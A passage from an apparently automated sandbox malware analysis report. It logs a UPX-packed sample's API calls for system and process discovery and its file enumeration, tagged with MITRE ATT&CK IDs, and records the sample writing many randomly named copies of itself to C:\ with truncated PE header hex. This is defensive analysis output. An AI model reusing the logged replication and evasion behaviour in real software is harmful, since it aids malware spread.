140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00283f1d00233f1d00000000000000000000001a0000000001ecdf12000000000050ed120095e1c677982c1700feffffff435cca775059ca77aa000000b8000000223f1d00203f1d0074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5cc97760d8d875ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096edca774a3f1d00a06aa0758600000074e11200ace512000000000086008800a06aa07574e11200916ca0754a3f1d00a06aa075a06aa075e4e5120002020000 (UID: 00000000-00006140)\n \"ltnxl.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006140)\n \"rllbfv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005416)\n \"rllbfv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00c8352d00c3352d00000000000000000000002500000000011ce312000000000080f0120095e1c67731511700feffffff435cca775059ca77aa000000b8000000c2352d00c0352d00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000025001c5cc97760d8d875ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edca77ea352d00a06aa07586000000a4e41200dce812000000000086008800a06aa075a4e41200916ca075ea352d00a06aa075a06aa07514e9120002020000 (UID: 00000000-00005416)\n \"rllbfv.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005416)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"vnxhhp.exe\" called \"IsWow64Process\" with parameter \"5936\" - (UID: 00000000-00005936)\n \"hvnjft.exe\" called \"IsWow64Process\" with parameter \"5952\" - (UID: 00000000-00005952)\n \"8284862.exe\" called \"IsWow64Process\" with parameter \"6080\" - (UID: 00000000-00006080)\n \"2664824.exe\" called \"IsWow64Process\" with parameter \"4516\" - (UID: 00000000-00004516)\n \"rbndhnn.exe\" called \"IsWow64Process\" with parameter \"6132\" - (UID: 00000000-00006132)\n \"ltnxl.exe\" called \"IsWow64Process\" with parameter \"6140\" - (UID: 00000000-00006140)\n \"rllbfv.exe\" called \"IsWow64Process\" with parameter \"5416\" - (UID: 00000000-00005416)\n \"nnpjtv.exe\" called \"IsWow64Process\" with parameter \"3892\" - (UID: 00000000-00003892)\n \"rbpjdh.exe\" called \"IsWow64Process\" with parameter \"3712\" - (UID: 00000000-00003712)\n \"68804.exe\" called \"IsWow64Process\" with parameter \"3728\" - (UID: 00000000-00003728)\n \"264608.exe\" called \"IsWow64Process\" with parameter \"4228\" - (UID: 00000000-00004228)\n \"hbxvf.exe\" called \"IsWow64Process\" with parameter \"2108\" - (UID: 00000000-00002108)\n \"djhdv.exe\" called \"IsWow64Process\" with parameter \"3784\" - (UID: 00000000-00003784)\n \"ndnvnh.exe\" called \"IsWow64Process\" with parameter \"3840\" - (UID: 00000000-00003840)\n \"nhxhrtb.exe\" called \"IsWow64Process\" with parameter \"3364\" - (UID: 00000000-00003364)\n \"fjprrfr.exe\" called \"IsWow64Process\" with parameter \"1820\" - (UID: 00000000-00001820)\n \"080068.exe\" called \"IsWow64Process\" with parameter \"4316\" - (UID: 00000000-00004316)\n \"04028.exe\" called \"IsWow64Process\" with parameter \"2064\" - (UID: 00000000-00002064)\n \"jjtpnvv.exe\" called \"IsWow64Process\" with parameter \"1428\" - (UID: 00000000-00001428)\n \"vtrrrtd.exe\" called \"IsWow64Process\" with parameter \"3368\" - (UID: 00000000-00003368)\n \"djblbb.exe\" called \"IsWow64Process\" with parameter \"4432\" - (UID: 00000000-00004432)\n \"bnjttb.exe\" called \"IsWow64Process\" with parameter \"788\" - (UID: 00000000-00000788)\n \"jxtvd.exe\" called \"IsWow64Process\" with parameter \"2028\" - (UID: 00000000-00002028)\n \"480606.exe\" called \"IsWow64Process\" with parameter \"3484\" - (UID: 00000000-00003484)\n \"684202.exe\" called \"IsWow64Process\" with parameter \"4308\" - (UID: 00000000-00004308)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter 67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter vnxhhp.exe (UID: 00000000-00005944)\n \"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005944)\n \"vnxhhp.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"FindNextFileW\" with parameter 67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe (UID: 00000000-00005936)\n \"vnxhhp.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005936)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"vnxhhp.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hvnjft.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8284862.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2664824.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rbndhnn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ltnxl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rllbfv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nnpjtv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rbpjdh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"68804.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"264608.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hbxvf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"djhdv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ndnvnh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nhxhrtb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fjprrfr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"080068.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"04028.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jjtpnvv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vtrrrtd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"djblbb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"bnjttb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jxtvd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"480606.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"684202.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac\" has an entrypoint in section \"UPX1\"\n \"rhnvfjn.exe\" has an entrypoint in section \"UPX1\"\n \"hlrxpfj.exe\" has an entrypoint in section \"UPX1\"\n \"4080482.exe\" has an entrypoint in section \"UPX1\"\n \"2286284.exe\" has an entrypoint in section \"UPX1\"\n \"2020002.exe\" has an entrypoint in section \"UPX1\"\n \"06062.exe\" has an entrypoint in section \"UPX1\"\n \"8808880.exe\" has an entrypoint in section \"UPX1\"\n \"dptrvt.exe\" has an entrypoint in section \"UPX1\"\n \"nxthl.exe\" has an entrypoint in section \"UPX1\"\n \"606282.exe\" has an entrypoint in section \"UPX1\"\n \"402060.exe\" has an entrypoint in section \"UPX1\"\n \"422022.exe\" has an entrypoint in section \"UPX1\"\n \"0066646.exe\" has an entrypoint in section \"UPX1\"\n \"066460.exe\" has an entrypoint in section \"UPX1\"\n \"6400262.exe\" has an entrypoint in section \"UPX1\"\n \"njxth.exe\" has an entrypoint in section \"UPX1\"\n \"rhnnvfl.exe\" has an entrypoint in section \"UPX1\"\n \"ddxvh.exe\" has an entrypoint in section \"UPX1\"\n \"trrfx.exe\" has an entrypoint in section \"UPX1\"\n \"ldprbfj.exe\" has an entrypoint in section \"UPX1\"\n \"rndlb.exe\" has an entrypoint in section \"UPX1\"\n \"nxdndh.exe\" has an entrypoint in section \"UPX1\"\n \"242220.exe\" has an entrypoint in section \"UPX1\"\n \"66846.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"67d4588ff46156a2c2ce7c68405faa77c37384adb7fea589176985ca4b27e1ac.exe\" wrote 14845 bytes starting with PE header signature to file \"C:\\vnxhhp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vnxhhp.exe\" wrote 14862 bytes starting with PE header signature to file \"C:\\hvnjft.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hvnjft.exe\" wrote 14877 bytes starting with PE header signature to file \"C:\\lxpbndn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lxpbndn.exe\" wrote 14889 bytes starting with PE header signature to file \"C:\\8284862.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8284862.exe\" wrote 14899 bytes starting with PE header signature to file \"C:\\2664824.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2664824.exe\" wrote 14918 bytes starting with PE header signature to file \"C:\\rbndhnn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rbndhnn.exe\" wrote 14933 bytes starting with PE header signature to file \"C:\\ltnxl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ltnxl.exe\" wrote 14945 bytes starting with PE header signature to file \"C:\\rllbfv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rllbfv.exe\" wrote 14961 bytes starting with PE header signature to file \"C:\\jvvbdv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jvvbdv.exe\" wrote 14977 bytes starting with PE header signature to file \"C:\\nnpjtv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nnpjtv.exe\" wrote 14992 bytes starting with PE header signature to file \"C:\\rbpjdh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rbpjdh.exe\" wrote 15002 bytes starting with PE header signature to file \"C:\\vnxlf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vnxlf.exe\" wrote 15021 bytes starting with PE header signature to file \"C:\\68804.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"68804.exe\" wrote 15038 bytes starting with PE header signature to file \"C:\\264608.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"264608.exe\" wrote 15058 bytes starting with PE header signature to file \"C:\\hbxvf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hbxvf.exe\" wrote 15069 bytes starting with PE header signature to file \"C:\\djhdv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"djhdv.exe\" wrote 15084 bytes starting with PE header signature to file \"C:\\vvlhl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vvlhl.exe\" wrote 15099 bytes starting with PE header signature to file \"C:\\ndnvnh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ndnvnh.exe\" wrote 15109 bytes starting with PE header signature to file \"C:\\nhxhrtb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nhxhrtb.exe\" wrote 15125 bytes starting with PE header signature to file \"C:\\hhprhp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hhprhp.exe\" wrote 15141 bytes starting with PE header signature to file \"C:\\fjprrfr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fjprrfr.exe\" wrote 15154 bytes starting with PE header signature to file \"C:\\nxxhj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxxhj.exe\" wrote 15164 bytes starting with PE header signature to file \"C:\\6644682.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6644682.exe\" wrote 15180 bytes starting with PE header signature to file \"C:\\4442828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4442828.exe\" wrote 15196 bytes starting with PE header signature to file \"C:\\080068.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"080068.exe\" wrote 15206 bytes starting with PE header signature to file \"C:\\04028.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"04028.exe\" wrote 15217 bytes starting with PE header signature to file \"C:\\jjtpnvv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jjtpnvv.exe\" wrote 15237 bytes starting with PE header signature to file \"C:\\vfvxb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vfvxb.exe\" wrote 15254 bytes starting with PE header signature to file \"C:\\vtrrrtd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vtrrrtd.exe\" wrote 15269 bytes starting with PE header signature to file \"C:\\llrlf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"llrlf.exe\" wrote 15279 bytes starting with PE header signature to file \"C:\\djblbb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"djblbb.exe\" wrote 15291 bytes starting with PE header signature to file \"C:\\phlthhl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"phlthhl.exe\" wrote 15307 bytes starting with PE header signature to file \"C:\\bnjttb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bnjttb.exe\" wrote 15323 bytes starting with PE header signature to file \"C:\\jxtvd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jxtvd.exe\" wrote 15340 bytes starting with PE header signature to file \"C:\\480606.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"480606.exe\" wrote 15360 bytes starting with PE header signature to file \"C:\\684202.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"684202.exe\" wrote 15372 bytes starting with PE header signature to file \"C:\\4600202.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4600202.exe\" wrote 15385 bytes starting with PE header signature to file \"C:\\244640.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"244640.exe\" wrote 15400 bytes starting with PE header signature to file \"C:\\6662204.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6662204.exe\" wrote 15418 bytes starting with PE header signature to file \"C:\\6602848.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6602848.exe\" wrote 15435 bytes starting with PE header signature to file \"C:\\06460.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06460.exe\" wrote 15454 bytes starting with PE header signature to file \"C:\\pfxjb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pfxjb.exe\" wrote 15469 bytes starting with PE header signature to file \"C:\\jfpjt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jfpjt.exe\" wrote 15486 bytes starting with PE header signature to file \"C:\\frftj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"frftj.exe\" wrote 15501 bytes starting with PE header signature to file \"C:\\404042.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"404042.exe\" wrote 15511 bytes starting with PE header signature to file \"C:\\680060.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"680060.exe\" wrote 15528 bytes starting with PE header signature to file \"C:\\22228.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22228.exe\" wrote 15541 bytes starting with PE header signature to file \"C:\\66846.exe\": 